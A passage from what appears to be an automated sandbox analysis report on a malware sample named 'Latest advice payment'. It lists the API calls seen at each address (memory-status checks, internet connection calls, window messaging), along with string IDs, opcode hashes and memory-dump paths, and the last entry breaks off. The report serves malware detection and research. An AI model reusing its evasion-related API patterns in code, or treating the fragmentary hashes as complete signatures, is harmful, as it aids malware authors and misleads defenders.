                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 612e54bb1c5a481e1e6848696961d89192fea0ae1b77f6c01c4ff5971d460fe6
                                                            • Instruction ID: 1f4f001e02b0ae6973ead56702862360735b8a55f05beec42c47214d1fb9378b
                                                            • Opcode Fuzzy Hash: 612e54bb1c5a481e1e6848696961d89192fea0ae1b77f6c01c4ff5971d460fe6
                                                            • Instruction Fuzzy Hash: D5616E75A00215EFDB14DF94C896FAEBBB8FB48310F14406DF916AB291DB70AE44CB91
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00572968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00572981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 9f65c9c0461413d297944a6d102bce25610a219bf0c79dd0e22fe5519bd7231f
                                                            • Instruction ID: 0016d2ad0a49da8cafe76730b2cf4695dc328b3f0af55703a695e01f5975249f
                                                            • Opcode Fuzzy Hash: 9f65c9c0461413d297944a6d102bce25610a219bf0c79dd0e22fe5519bd7231f
                                                            • Instruction Fuzzy Hash: 275128724187459BD320EF10D88ABABBBECFBC5344F41895DF2D8421A1DF318969CB66
                                                            APIs
                                                              • Part of subcall function 00564F0B: __fread_nolock.LIBCMT ref: 00564F29
                                                            • _wcscmp.LIBCMT ref: 005C9824
                                                            • _wcscmp.LIBCMT ref: 005C9837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: c3ae97f6664f2a5b9d93f9346c15289beba758adfca3e617b92d5200d1a88e3a
                                                            • Instruction ID: 40e7e4d2c9b7927916b4103eeabe404850ae9dedf9dedab09a4605af83db657a
                                                            • Opcode Fuzzy Hash: c3ae97f6664f2a5b9d93f9346c15289beba758adfca3e617b92d5200d1a88e3a
                                                            • Instruction Fuzzy Hash: A6419571A0021ABEDF219AE4CC5AFEFBFBDEF85710F014469F904A7181DA719904CBA5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: Ddb$Ddb
                                                            • API String ID: 1473721057-2807125207
                                                            • Opcode ID: 085f6e64f4e2c6981dcbfda732fa17f2de2b3de59e25c1e1204e71969113cc4b
                                                            • Instruction ID: 640f415bba23a8e1290e99128a607601d63b7f8300213bf40c8d41745e9a0cb6
                                                            • Opcode Fuzzy Hash: 085f6e64f4e2c6981dcbfda732fa17f2de2b3de59e25c1e1204e71969113cc4b
                                                            • Instruction Fuzzy Hash: 4F51EE786087428FDB64DF18C484A1ABBF2BB99354F54981CF9859B361D731EC81CF92
                                                            APIs
                                                            • _memset.LIBCMT ref: 005D259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 005D25D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: c1bd03189d73dc2decfd2087b09458576a9c4eeb7a304d1922a7a106408f62e4
                                                            • Instruction ID: 411651e9f45348ffdc0b9c5d8425853c9433674fa72a424fd8a10522cb6fbfe6
                                                            • Opcode Fuzzy Hash: c1bd03189d73dc2decfd2087b09458576a9c4eeb7a304d1922a7a106408f62e4
                                                            • Instruction Fuzzy Hash: BE311A7180011AEBCF11EFA4CC89EEEBFB8FF58310F10015AF915A6265EA319955DB60
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 005E7B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005E7B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: caf66d3a8045f1319e67bb8a41b04d1573d5768ef3f82cd74781d0073ec57afc
                                                            • Instruction ID: 7581e03cec15f81acf96357aaf06c5c8922bb2b22a9a89ff0c899ac8b5f79fdb
                                                            • Opcode Fuzzy Hash: caf66d3a8045f1319e67bb8a41b04d1573d5768ef3f82cd74781d0073ec57afc
                                                            • Instruction Fuzzy Hash: CE410874A0564E9FDB18CF65D881BEABBB9FB08300F10016AE945EB351E770AA51DF90
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 005E6B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005E6B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 13488f398e2320cda5e47297c2733eee7da1973c14ef911e0dc0db15680a5340
                                                            • Instruction ID: 6ee0d873f7bbb018477bacebf03e0549ae909ce0076eafbf048e106bc34de9fc
                                                            • Opcode Fuzzy Hash: 13488f398e2320cda5e47297c2733eee7da1973c14ef911e0dc0db15680a5340
                                                            • Instruction Fuzzy Hash: 94319E71200644AEEB149F65CC80BFB7BADFF987A0F109629F9E5D7190DA30AC81D760
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005C294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 5e1b6e1e413fd8642f8f515e30f0cb6270c84208a7135f8f283e0c030be1d4f5
                                                            • Instruction ID: 39f7f6b0a9983361946a412f89aa962d1b4d7114967837727d91803bf1907f97
                                                            • Opcode Fuzzy Hash: 5e1b6e1e413fd8642f8f515e30f0cb6270c84208a7135f8f283e0c030be1d4f5
                                                            • Instruction Fuzzy Hash: 4231BF31600309DFEB24DE98C885FAEBFB9FF45350F14402DE985A61A0D7B09984CB51
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005E6761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005E676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: fb280629c8f85a4b05f197ce18168f12a7b00baaae09614ee924bb5372d1d8db
                                                            • Instruction ID: aed5e067fef4a24e35e3dbc6316191f1eb2a0f0a1671ed2085cbd686fc2178e2
                                                            • Opcode Fuzzy Hash: fb280629c8f85a4b05f197ce18168f12a7b00baaae09614ee924bb5372d1d8db
                                                            • Instruction Fuzzy Hash: 6B11B271200249AFEF299F55CC80EBB3B6AFB983E8F104129F99597290D631DC9187A0
                                                            APIs
                                                              • Part of subcall function 00561D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00561D73
                                                              • Part of subcall function 00561D35: GetStockObject.GDI32(00000011), ref: 00561D87
                                                              • Part of subcall function 00561D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00561D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 005E6C71
                                                            • GetSysColor.USER32(00000012), ref: 005E6C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 3ab8a842d32572b350a9190007a4a127624ce99d45a63613ce92a90644a653a0
                                                            • Instruction ID: 4a07c4b4066c1b2df47e6fc77d241fc69a3420cfa6f8bbb4b6bcd484027a6768
                                                            • Opcode Fuzzy Hash: 3ab8a842d32572b350a9190007a4a127624ce99d45a63613ce92a90644a653a0
                                                            • Instruction Fuzzy Hash: B821597251024AAFDF08DFA9CC45AFA7BB8FB18354F104629F996D3250E735E850DB60
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 005E69A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005E69B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 70fd902d10107d50835e92fd068ab31a1198a9cd4dec0d7386c5a4bb2347d606
                                                            • Instruction ID: 37b703bcaceec48214d96ddaaf6b395749f7d46400860655dabaa007461cee2b
                                                            • Opcode Fuzzy Hash: 70fd902d10107d50835e92fd068ab31a1198a9cd4dec0d7386c5a4bb2347d606
                                                            • Instruction Fuzzy Hash: 85119A71100288ABEB188F659C84AAB3AA9FB253F4F104724F9E1D71E1CB31DC90A760
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005C2A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: f0d03004115ebcf50bc97a6d344eb7dabe896e335df8a71d2886ef83ddaa59ce
                                                            • Instruction ID: 8968b7458638561d6d79b8a550deed87bef8fc5d41ac9c25fdb5e8732fb3a688
                                                            • Opcode Fuzzy Hash: f0d03004115ebcf50bc97a6d344eb7dabe896e335df8a71d2886ef83ddaa59ce
                                                            • Instruction Fuzzy Hash: 01119032901528AFDB34DAD8DC44FAA7BA9BB45310F14403DE856E7290DBB0AD0AC791
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005D222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 005D2255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: ad3ac418851c089fde10219a5bfcb9614556498e7d6f75e245423230b806c736
                                                            • Instruction ID: bf69340ab6d6c42d4d6d825f2ef021dee9adb35dc130ed7a16221068347e1295
                                                            • Opcode Fuzzy Hash: ad3ac418851c089fde10219a5bfcb9614556498e7d6f75e245423230b806c736
                                                            • Instruction Fuzzy Hash: A011EC74501265BEDB398F598C88EBBFFA8FF26351F10862BF90586200D2706984DAF0
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00563C14,006252F8,?,?,?), ref: 0057096E
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _wcscat.LIBCMT ref: 005A4CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: Sb
                                                            • API String ID: 257928180-3592133247
                                                            • Opcode ID: aa604db13a5377a83509877bc0fcb10ba5dc46f3ecb2eb31b6281d3d9151bfa4
                                                            • Instruction ID: 7846808963953676be791ea2425e1bc4d9859afa5b92bc394d4544fefaf7e072
                                                            • Opcode Fuzzy Hash: aa604db13a5377a83509877bc0fcb10ba5dc46f3ecb2eb31b6281d3d9151bfa4
                                                            • Instruction Fuzzy Hash: 2511A93090561A9A8B50FB74E809EDD7FF9BF48360B0095A5BA49D71D1FA7096845B10
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005B8E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: af70d0a160ce864efe1633190ff3e57b273c418f80a3c69b97b11c347a313213
                                                            • Instruction ID: f41615ae310065eba01f0a5af808c1396df028a4be833537912b2f953cda6644
                                                            • Opcode Fuzzy Hash: af70d0a160ce864efe1633190ff3e57b273c418f80a3c69b97b11c347a313213
                                                            • Instruction Fuzzy Hash: 4701247164122AABCB14EBA4CC898FE7B7DFF45320B040A19F871572E1EE31A808C660
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 623e1639efdfbfa87a2504b7b3db5253c9093d21576c8889be5ed3872338a77d
                                                            • Instruction ID: 5c0fcbf32473bc20b29613c60f1bbda4fe57386c4a05661c1138a1ba237836bc
                                                            • Opcode Fuzzy Hash: 623e1639efdfbfa87a2504b7b3db5253c9093d21576c8889be5ed3872338a77d
                                                            • Instruction Fuzzy Hash: AA01F971C042187EDB68DAA8C81AEFE7FF8DB11301F00459EF553D2181E874A6088760
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 005B8D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 2facd5bc1a851229c69b82ccea4c86629c7692b81ee51509c9a11cd616316409
                                                            • Instruction ID: 03c09c61fcf88d5d18a5b8407f4e0b3f4b981f2a9f5af27209899b8fc5189fbd
                                                            • Opcode Fuzzy Hash: 2facd5bc1a851229c69b82ccea4c86629c7692b81ee51509c9a11cd616316409
                                                            • Instruction Fuzzy Hash: D901F771B4110AABCB15EBA0C99AEFE7BBCEF55300F14042AB801672D1DE206E08D6B1
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 005B8DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 266a7d63a18979ae62b5b580b18b8037f1e62e1598fee00562d161f088e38caa
                                                            • Instruction ID: eb6454fc98de94d58912a7b7d9ed894b84b69cdc92332895d9feb75de912ac53
                                                            • Opcode Fuzzy Hash: 266a7d63a18979ae62b5b580b18b8037f1e62e1598fee00562d161f088e38caa
                                                            • Instruction Fuzzy Hash: 8A01DB71A4110ABBDF15E7A4C986EFE7BACEF25300F140416B845632D1DE215E08D671
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005BC534
                                                              • Part of subcall function 005BC816: _memmove.LIBCMT ref: 005BC860
                                                              • Part of subcall function 005BC816: VariantInit.OLEAUT32(00000000), ref: 005BC882
                                                              • Part of subcall function 005BC816: VariantCopy.OLEAUT32(00000000,?), ref: 005BC88C
                                                            • VariantClear.OLEAUT32(?), ref: 005BC556
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$ClearCopy_memmove
                                                            • String ID: d}a
                                                            • API String ID: 2932060187-280751259
                                                            • Opcode ID: 71a05344b0237d1f415be472adbbfb1b4feebba25794236aea5746ab8f4bb526
                                                            • Instruction ID: f11e3e7051111e6110044a33e1ba8ee360dc0e9d8ce681d4b3f8747b3852459e
                                                            • Opcode Fuzzy Hash: 71a05344b0237d1f415be472adbbfb1b4feebba25794236aea5746ab8f4bb526
